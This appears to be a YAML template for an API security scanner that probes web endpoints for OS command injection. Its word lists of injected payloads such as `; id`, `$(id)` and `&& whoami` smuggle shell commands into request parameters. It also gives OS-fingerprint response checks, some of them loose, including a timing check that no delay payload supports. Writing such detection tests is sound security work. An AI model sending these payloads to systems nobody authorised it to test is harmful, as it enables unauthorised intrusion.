---
id: COMMAND_INJECTION_OS_AGNOSTIC
info:
  name: "Command Injection - OS Agnostic (All Operating Systems)"
  description: >
    "Unified command injection test that automatically detects the operating system and tests for command 
    injection vulnerabilities across all major operating systems (Linux, Windows, macOS). This template 
    first probes for OS detection, then applies OS-specific payloads. It works across all HTTP methods 
    and parameter locations (query, body, headers, URL path)."
  details: >
    "This consolidated template replaces multiple OS-specific command injection templates by using adaptive 
    OS detection. It first executes generic OS detection commands (id, uname, ver) to identify the target 
    OS, then applies OS-specific payloads. The template tests all parameter locations and HTTP methods 
    automatically, ensuring comprehensive coverage without requiring separate templates for each OS."
  impact: >
    "Command injection vulnerabilities allow attackers to execute arbitrary commands on the server, leading 
    to complete system compromise. This unified template provides comprehensive coverage across all 
    operating systems and attack vectors, ensuring vulnerabilities are detected regardless of the target OS."
  category:
    name: COMMAND_INJECTION
    shortName: Command Injection
    displayName: Command Injection
  subCategory: COMMAND_INJECTION_OS_AGNOSTIC
  severity: CRITICAL
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
    - Command Injection
  references:
    - "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/"
    - "https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html"
  cwe:
    - CWE-77
    - CWE-78
  cve:
    - CVE-2023-25826
    - CVE-2023-41031

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  method:
    contains_either:
      - GET
      - POST
      - PUT
      - PATCH
      - DELETE
  response_code:
    gte: 200
    lt: 300
  response_payload:
    length:
      gt: 0
    not_contains:
      - Error
      - Internal Server
      - Failed
      - Unauthorized
      - access denied
      - Forbidden
      - Method Not allowed
      - Gateway timeout
      - request timeout
      - server error
      - server busy
      - authentication error
      - authorization error
      - validation error
      - Permission Denied
      - invalid token
      - token expired
      - session expired
      - session timeout
      - unexpected error
      - unable to process request
      - bad request
      - service unavailable
      - account is locked
      - account is blocked
      - multiple failed attempts
  or:
    - query_param:
        for_one:
          key:
            regex: ".*"
            extract: paramKey
          value:
            extract: paramVal
    - request_payload:
        for_one:
          key:
            regex: ".*"
            extract: paramKey
          value:
            extract: paramVal
    - request_headers:
        for_one:
          key:
            regex: ".*"
            extract: headerKey
          value:
            extract: headerVal
    # Fallback: Match any API (for testing command injection)
    - url:
        extract: urlVar
  # Always extract URL if it exists
  url:
    extract: urlVar

wordLists:
  # OS Detection payloads (generic)
  osDetectionPayloads:
    - "; id"
    - "&& id"
    - "|| id"
    - "| id"
    - "`id`"
    - "$(id)"
    - "; uname -a"
    - "&& uname -a"
    - "|| uname -a"
    - "; ver"
    - "&& ver"
    - "|| ver"
    - "; whoami"
    - "&& whoami"
    - "|| whoami"
  
  # Linux-specific payloads
  linuxPayloads:
    - "; lsb_release -a"
    - "&& lsb_release -a"
    - "|| lsb_release -a"
    - "; ifconfig"
    - "&& ifconfig"
    - "; dpkg -l | head -n 10"
    - "&& dpkg -l | head -n 10"
    - "; cat /etc/os-release"
    - "&& cat /etc/os-release"
    - "; uname -r"
    - "&& uname -r"
  
  # Windows-specific payloads
  windowsPayloads:
    - "; systeminfo"
    - "&& systeminfo"
    - "|| systeminfo"
    - "; ipconfig"
    - "&& ipconfig"
    - "|| ipconfig"
    - "; ver"
    - "&& ver"
    - "; hostname"
    - "&& hostname"
  
  # macOS-specific payloads
  macosPayloads:
    - "; sw_vers"
    - "&& sw_vers"
    - "|| sw_vers"
    - "; system_profiler SPSoftwareDataType"
    - "&& system_profiler SPSoftwareDataType"
  
  # Generic command execution payloads
  genericPayloads:
    - "; echo command_injected"
    - "&& echo command_injected"
    - "|| echo command_injected"
    - "; echo 'test'"
    - "&& echo 'test'"
    - "| echo 'test'"
    - "`echo 'test'`"
    - "$(echo 'test')"

execute:
  type: multiple
  requests:
    # Baseline request
    - req:
        - add_header:
            dummyKey: dummyVal
        - validate:
            response_code:
              gte: 200
              lt: 300
            response_payload:
              length:
                gt: 0
        - success: baseline
        - failure: exit
    
    # Step 1: OS Detection - Test generic commands
    - req:
        - modify_query_param:
            paramKey: ${paramVal}${osDetectionPayloads}
        - modify_body_param:
            paramKey: ${paramVal}${osDetectionPayloads}
        - validate:
            response_code:
              gte: 200
              lt: 500
        - success: x2
        - failure: exit
    
    # Step 2: Linux-specific payloads
    - req:
        - modify_query_param:
            paramKey: ${paramVal}${linuxPayloads}
        - modify_body_param:
            paramKey: ${paramVal}${linuxPayloads}
        - validate:
            response_code:
              gte: 200
              lt: 500
        - success: x3
        - failure: exit
    
    # Step 3: Windows-specific payloads
    - req:
        - modify_query_param:
            paramKey: ${paramVal}${windowsPayloads}
        - modify_body_param:
            paramKey: ${paramVal}${windowsPayloads}
        - validate:
            response_code:
              gte: 200
              lt: 500
        - success: x4
        - failure: exit
    
    # Step 4: macOS-specific payloads
    - req:
        - modify_query_param:
            paramKey: ${paramVal}${macosPayloads}
        - modify_body_param:
            paramKey: ${paramVal}${macosPayloads}
        - validate:
            response_code:
              gte: 200
              lt: 500
        - success: x5
        - failure: exit
    
    # Step 5: Generic command execution
    - req:
        - modify_query_param:
            paramKey: ${paramVal}${genericPayloads}
        - modify_body_param:
            paramKey: ${paramVal}${genericPayloads}
        - validate:
            response_code:
              gte: 200
              lt: 500

validate:
  or:
    # Linux detection indicators (strong indicators)
    - and:
        - response_payload:
            contains_either:
              - "uid="
              - "gid="
              - "groups="
              - "Distributor ID"
              - "Ubuntu"
              - "Debian"
              - "CentOS"
              - "Red Hat"
              - "Amazon Linux"
              - "txqueuelen"
              - "Ethernet"
              - "adduser"
              - "bash"
              - "Linux"
            not_contains:
              - Error
              - Internal Server
              - Failed
              - Unauthorized
              - access denied
              - Forbidden
              - <html>
              - </html>
        # Response differs from baseline (command executed)
        - response_payload:
            neq_obj: "${baseline.response.body}"
    # Windows detection indicators (strong indicators)
    - and:
        - response_payload:
            contains_either:
              - "Microsoft"
              - "System Manufacturer"
              - "Connection-specific DNS Suffix"
              - "Wireless LAN adapter Wi-Fi"
              - "Ethernet adapter Local Area Connection"
              - "Windows"
              - "OS Name"
              - "OS Version"
            not_contains:
              - Error
              - Internal Server
              - Failed
              - Unauthorized
              - access denied
              - Forbidden
              - <html>
              - </html>
        # Response differs from baseline (command executed)
        - response_payload:
            neq_obj: "${baseline.response.body}"
    # macOS detection indicators (strong indicators)
    - and:
        - response_payload:
            contains_either:
              - "ProductName"
              - "ProductVersion"
              - "BuildVersion"
              - "macOS"
              - "Darwin"
            not_contains:
              - Error
              - Internal Server
              - Failed
              - Unauthorized
              - access denied
              - Forbidden
              - <html>
              - </html>
        # Response differs from baseline (command executed)
        - response_payload:
            neq_obj: "${baseline.response.body}"
    # Generic command execution indicators
    - and:
        - response_payload:
            contains_either:
              - "command_injected"
              - "test"
              - "root:"
              - "www-data:"
              - "daemon:"
              - "nobody:"
            not_contains:
              - Error
              - Internal Server
              - Failed
              - Unauthorized
              - access denied
              - Forbidden
              - <html>
              - </html>
        # Response differs from baseline (command executed)
        - response_payload:
            neq_obj: "${baseline.response.body}"
    # Command injection via response change detection (catches subtle cases)
    - and:
        - response_code:
            gte: 200
            lt: 500
        - response_payload:
            length:
              gt: 0
        # Response significantly different from baseline (command executed)
        - response_payload:
            neq_obj: "${baseline.response.body}"
        # Response length changed (command output added)
        - response_payload:
            length:
              neq: "${baseline.response.body.length}"
        # No error messages (command was accepted)
        - response_payload:
            not_contains:
              - "Error"
              - "Invalid"
              - "Rejected"
              - "Blocked"
              - "Command"
              - "Security"
              - "Forbidden"
        # Response contains command-like patterns
        - response_payload:
            contains_either:
              - "uid="
              - "gid="
              - "root:"
              - "www-data:"
              - "Microsoft"
              - "Windows"
              - "Linux"
              - "Darwin"
              - "bash"
              - "sh"
              - "cmd"
              - "powershell"
    # Command injection via timing (response delayed significantly)
    - and:
        - response_code:
            gte: 200
            lt: 500
        - response_payload:
            length:
              gt: 0
        # Response time significantly longer than baseline (command execution delay)
        - response_time:
            gt: "${baseline.response.stats.median_response_time + 2000}"
        # Response differs from baseline
        - response_payload:
            neq_obj: "${baseline.response.body}"




